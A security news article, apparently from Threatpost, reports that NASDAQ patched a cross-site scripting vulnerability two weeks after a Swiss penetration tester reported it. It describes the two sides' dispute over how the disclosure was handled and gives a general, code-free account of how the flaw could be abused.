NASDAQ Fixes XSS 2 Weeks After Bug Reported

NASDAQ took two weeks to patch a cross-site scripting vulnerability on its website discovered by a Swiss pen-testing outfit.

A NASDAQ representative confirmed this morning that a cross-site scripting vulnerability on the exchange’s website discovered by an ethical hacker has been patched.

The issue was reported on Sept. 2 by Ilia Kolochenko, chief executive of High-Tech Bridge, a Swiss penetration testing company. Kolochenko characterized the issue as a relatively simple cross-site scripting vulnerability.

“It’s not something that would shut down the site, but if a good hacker group wanted to hack them, XSS will make that hack simpler for them,” Kolochenko said, adding that it took two weeks for NASDAQ to address the situation and that it did so only after media reports surfaced on the vulnerability.

NASDAQ said it addressed the issue immediately internally.

“We have fixed the vulnerability, and we began working on the issue once it was flagged to us by the High-Tech CEO – we address any and all vulnerabilities identified, whether internally via our standard processes or externally, like the one we received on September 2,” a NASDAQ representative said in an email to Threatpost.

NASDAQ suffered an outage on Aug. 22 that prompted the exchange to shut down for three hours; a software error was blamed. Kolochenko said the outage prompted him to look at the Web platform used by NASDAQ and that he then discovered a Web application vulnerable to cross-site scripting attacks.

“A quick and totally harmless test confirmed an exploitable XSS vulnerability that allows injecting arbitrary HTML and scripting code into webpages,” he said in a statement.

NASDAQ said it validated the claim, as it does with all reported vulnerabilities.

“We take all information security matters seriously,” NASDAQ said. “We work with leading security vendors and have a trained and professional team that evaluates all credible threats across our digital assets.”

Kolochenko said an attacker could gain access to a protected portion of the NASDAQ environment, such as an administrative portal, and modify content on the site.

“Assuming the hackers know where this [vulnerable] component is located, he has to find someone from NASDAQ who can access it, send him a link pointing to that will exploit the cross-site scripting vulnerability,” Kolochenko said. “When the person who gets the link clicks on it, his cookies or other sensitive information will be sent along. The hacker will receive this information and will be able to log in to an admin panel with the victim’s user name and password and can do any modification on the site he wants.”

Kolochenko said the NASDAQ site has no mechanism on which to report security vulnerabilities, something NASDAQ denies, adding that such channels are used regularly. Kolochenko contends that only after two weeks and a barrage of initial media reports over the weekend about his discovery of the vulnerability did NASDAQ move to action.

“I have checked all my email and spam folders and I have never ever received a single email from NASDAQ, a NASDAQ contractor, or anyone related to them,” Kolochenko said. “If NASDAQ insists they replied to me, my question is simple: Why after all the articles about the issue didn’t NASDAQ try to contact me again? No one resent the original contact, notified or replied to me.”

This week, meanwhile, U.S. stock exchanges and Federal regulators agreed to reforms, including a kill-switch mechanism that would shut down trades during emergencies, Reuters reported.

“I stressed the need for all market participants to work collaboratively – together and with the Commission – to strengthen critical market infrastructure and improve its resilience when technology falls short,” said Securities and Exchange Commission chair Mary Jo White.

Suggested articles